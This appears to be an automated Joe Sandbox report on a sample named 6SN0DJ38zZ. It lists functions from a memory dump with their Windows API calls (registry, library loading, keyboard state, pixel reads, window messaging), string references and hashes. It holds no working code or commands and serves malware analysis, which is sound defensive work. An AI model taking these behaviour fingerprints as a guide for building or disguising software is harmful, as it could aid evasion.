Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: e836427516977e0c8307c067838f545e6a7fbfe3622f2a46ac5825641d85aceb
Instruction ID: c8b4dad7cf2b617c3b076785e90f45bcc620bb007b35431bfe3fa9c3377eeaa4
Opcode Fuzzy Hash: e836427516977e0c8307c067838f545e6a7fbfe3622f2a46ac5825641d85aceb
Instruction Fuzzy Hash: 99215E71500209BFEF108FA4ED40EBB77ADEF59368F148629F920961D0D7729C629760

Function 009E6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 009E6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009E6DEF
GetStdHandle.KERNEL32(0000000C), ref: 009E6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009E6E3B

Strings

nul, xrefs: 009E6E36

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 9617ad63d5322bf2e766b64536035cc237f247aadf50c69c420470758e51ffc5
Instruction ID: 4bf494a4b2076df911ebfbc0c66df93e5fc7ddd7035962139e027aae980585d2
Opcode Fuzzy Hash: 9617ad63d5322bf2e766b64536035cc237f247aadf50c69c420470758e51ffc5
Instruction Fuzzy Hash: FA21A174600249ABDB219F6ADC05B9A7BB8EFA4760F204A19FDA0D72D0D7709C518B50

Function 009E6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009E6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009E6EBB
GetStdHandle.KERNEL32(000000F6), ref: 009E6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009E6F06

Strings

nul, xrefs: 009E6F01

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 6f30856b085fefc4ed11f3b9cbb992445895e519084bd78176e1fc19afb5190e
Instruction ID: 09580661c12325a274a7b568bf0991a2b815b02eef6b405a066b015fa8ca7fbf
Opcode Fuzzy Hash: 6f30856b085fefc4ed11f3b9cbb992445895e519084bd78176e1fc19afb5190e
Instruction Fuzzy Hash: F621B0795003459BDB219F6ACC04AAA77A8AF657A0F200A5DF9E0E32D0D770AC618B10

Function 009EAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009EAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009EACA8
__swprintf.LIBCMT ref: 009EACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00A0F910), ref: 009EACFF

Strings

%lu, xrefs: 009EACBB

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: db178a3207cc94c3aca21131b9ace61da6d2109adc9f5462e082b0db489066d0
Instruction ID: be15e1e7575cc4b8ba341c0373dbb495d5a068359c21d3e922596e1f35355941
Opcode Fuzzy Hash: db178a3207cc94c3aca21131b9ace61da6d2109adc9f5462e082b0db489066d0
Instruction Fuzzy Hash: C7219030A00109AFCB10EF65C945EAE7BB8FF89314B004469F909AB351DA31EA41CB61

Function 009E1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009E1B19

Strings

APPEND, xrefs: 009E1B52
KEYS, xrefs: 009E1B30
REMOVE, xrefs: 009E1B1F
EXISTS, xrefs: 009E1B41

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: d00b002e45c459ac9d9f2dca1d203333bd89b39ba2443d9092cc3804f83dcf41
Instruction ID: b21fd671cd0877a32b44e9d2bd4bf36fe72a1009e0431fdabd5d2bfa53db61d9
Opcode Fuzzy Hash: d00b002e45c459ac9d9f2dca1d203333bd89b39ba2443d9092cc3804f83dcf41
Instruction Fuzzy Hash: 6B1184319002588FCF00EF94D8559FEB7B4FFA6708F584465E815A7696EB329D06CB50

Function 009FEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009FEC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 009FEC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009FED6A
CloseHandle.KERNEL32(?), ref: 009FEDEB

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 47f0202fb47e1ddcae1fb27c4a8430e3771e282e0b1c76232cbd5d8518bf4f09
Instruction ID: 8bed5c5f6bc41f86863370c1649b69958d2698a041c5a35fcfb73a1477b6d01c
Opcode Fuzzy Hash: 47f0202fb47e1ddcae1fb27c4a8430e3771e282e0b1c76232cbd5d8518bf4f09
Instruction Fuzzy Hash: F28150716003019FD760EF28C886F2AB7E5AF88714F54881DFA9A9B3D2DA70AC41CB51

Function 009A541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 009A547B
_memcpy_s.LIBCMT ref: 009A54ED
__read_nolock.LIBCMT ref: 009A554B
__filbuf.LIBCMT ref: 009A556E
_memset.LIBCMT ref: 009A55B2

Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: d546934cc353bcf0b98597a77321d27220fca78b565254fd885d754c9b256029
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 3751C570F00B05DBCB249F69D8846AE77BAAF46331F258729F825962D1D774DD908BC0

Function 00A00037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Part of subcall function 00A00E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A000FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A00183
RegCloseKey.ADVAPI32(?,?), ref: 00A001AF
RegCloseKey.ADVAPI32(00000000), ref: 00A001BC

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 16ef868a96004ef378f2447dad4faebe033977d9fab40a8f350f53923f33dcd4
Instruction ID: 3c2e52d1c6ad9c389223b63e91d09be456d2508fe7e859f368a398b5aa00c6b9
Opcode Fuzzy Hash: 16ef868a96004ef378f2447dad4faebe033977d9fab40a8f350f53923f33dcd4
Instruction Fuzzy Hash: 12519D71208208AFC714EF68DC81F6AB7E8FF84314F44892DF595972A2DB31E905CB52

Function 009FD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009FD927
GetProcAddress.KERNEL32(00000000,?), ref: 009FD9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 009FD9C6
GetProcAddress.KERNEL32(00000000,?), ref: 009FDA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009FDA21

Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7896,?,?,00000000), ref: 00985A2C
Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7896,?,?,00000000,?,?), ref: 00985A50

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 202cb3d7f9ab519b6a0316ecb9544ce98a9167141e58526f252a8b73ebfe4be7
Instruction ID: 525c9a81259cbd4aaa4ffaff34fe1e204296f2f9fb35949ac227d3cea2815ff6
Opcode Fuzzy Hash: 202cb3d7f9ab519b6a0316ecb9544ce98a9167141e58526f252a8b73ebfe4be7
Instruction Fuzzy Hash: B1514935A01209DFCB00EFA8C484AADB7F9FF49324B15816AE955AB312D731ED46CF91

Function 009EE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009EE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009EE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009EE687

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009EE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009EE6B4

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: a93ad7bd1c9014230d56e58be5bec0f716cf47a1f7cd369e5069451632f6af41
Instruction ID: aaaaff77f84c7f01e7d5552137f661cf08057d9f4fb0f7b2361be85e6c9e3dd5
Opcode Fuzzy Hash: a93ad7bd1c9014230d56e58be5bec0f716cf47a1f7cd369e5069451632f6af41
Instruction Fuzzy Hash: 6351FB35A00205DFCB11EF65C985AAEBBF5EF49314F1480A9E819AB361DB31ED11DF50

Function 00A0A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5146fd71e5e492257d36b1cb1dd747e580dfbd827647fb9860c36810d79baf8
Instruction ID: 6a2c1571c925af613a66451e22a9bbe1a69c4d981991ae40ea6a27923592d1dd
Opcode Fuzzy Hash: f5146fd71e5e492257d36b1cb1dd747e580dfbd827647fb9860c36810d79baf8
Instruction Fuzzy Hash: 1F41A535A0431CAFD720DF78EC48FA9BBB4EB29310F154265F916A72E1C770AD42DA51

Function 00982344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00982357
ScreenToClient.USER32(00A457B0,?), ref: 00982374
GetAsyncKeyState.USER32(00000001), ref: 00982399
GetAsyncKeyState.USER32(00000002), ref: 009823A7

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 4d58231b8a3ab56ea64c377db66de631eed83474d52e36203b9dc0a3314b3914
Instruction ID: 915458f2b5ab6f1b1f27e06cfe1cce4e28a58cc6342a54286566f8dae1fefd2b
Opcode Fuzzy Hash: 4d58231b8a3ab56ea64c377db66de631eed83474d52e36203b9dc0a3314b3914
Instruction Fuzzy Hash: 37417175604109FFCF25AF68CD44AE9BB79FB05764F20431AF829A6290C734A950DB91

Function 009D63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 009D6433
TranslateMessage.USER32(?), ref: 009D645C
DispatchMessageW.USER32(?), ref: 009D6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D6475

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 9c14a00ddbc9abd31e88ab65ec2a7ade73e7ab218e0bd82ed876c2a22bb610da
Instruction ID: 43633bd8dcd8639b9d9ad6cf5d2a92c9c2a5421ea65d54bee52d716ce5084c35
Opcode Fuzzy Hash: 9c14a00ddbc9abd31e88ab65ec2a7ade73e7ab218e0bd82ed876c2a22bb610da
Instruction Fuzzy Hash: 0931C6359806469FDB64CFF4CC44BF6BBACAB42310F14857BE421C32B1E76A944ADB50

Function 009D8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 009D8A30
PostMessageW.USER32(?,00000201,00000001), ref: 009D8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 009D8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 009D8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009D8AF8

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: abc0af0fbc1b7b958abff969241a842b1b2ba042626b0031e2c66d18faadeff2
Instruction ID: c29c8316563781abb0b0326f06f0e94ebaba7a037629138f75947f732cc393b9
Opcode Fuzzy Hash: abc0af0fbc1b7b958abff969241a842b1b2ba042626b0031e2c66d18faadeff2
Instruction Fuzzy Hash: 7D31CE71500219EFDF14CFA8D94CA9F3BB9EB04315F10862AF925EB2D2CBB49915DB90

Function 009DB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 009DB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009DB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009DB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009DB27F
_wcsstr.LIBCMT ref: 009DB289

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 8ac3afe2958f75c9417c4b5541877e3c9f54748118cabdfae5d0280f3519141b
Instruction ID: dc4d9ae094c783153e805a878980a17a20454cbb69ec74a7f3267932db552aa0
Opcode Fuzzy Hash: 8ac3afe2958f75c9417c4b5541877e3c9f54748118cabdfae5d0280f3519141b
Instruction Fuzzy Hash: 55213A33644204BBEB259B759C49F7F7B9CDF9A710F01813AF904DA251EF61DC4192A0

Function 00A0B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

GetWindowLongW.USER32(?,000000F0), ref: 00A0B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A0B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A0B1CF
GetSystemMetrics.USER32(00000004), ref: 00A0B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,009F0E90,00000000), ref: 00A0B216

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 0eb96a8fb6e7cbb167db5171dcc3be37c6a2fa93671204e39f712c285fc7e63c
Instruction ID: d27f071caefd450ece9e6df4c05c9fee85c04b4f368ba6d0bef225b52dd7b6a4
Opcode Fuzzy Hash: 0eb96a8fb6e7cbb167db5171dcc3be37c6a2fa93671204e39f712c285fc7e63c
Instruction Fuzzy Hash: 2B21A371920259AFCB209F78ED14A6A37A4FB09721F104738FD32D71E1E7309852DBA0

Function 009D9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009D9320

Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D9352
__itow.LIBCMT ref: 009D936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D9392
__itow.LIBCMT ref: 009D93A3

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: d89663649f5cb8b2f30a85040724bbbf6dbd6179668d1a15b61195c73a1869c4
Instruction ID: fcfa39ca632d1c027c5f3fa8cce9c016beddcf5e3c276aeb8615cf6a3dd55786
Opcode Fuzzy Hash: d89663649f5cb8b2f30a85040724bbbf6dbd6179668d1a15b61195c73a1869c4
Instruction Fuzzy Hash: 6F21D731740208BFDB20BAA48C85FAEFBADEB89710F148026F945E73D1D6B0CD429791

Function 009F5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 009F5A6E
GetForegroundWindow.USER32 ref: 009F5A85
GetDC.USER32(00000000), ref: 009F5AC1
GetPixel.GDI32(00000000,?,00000003), ref: 009F5ACD
ReleaseDC.USER32(00000000,00000003), ref: 009F5B08

Memory Dump Source

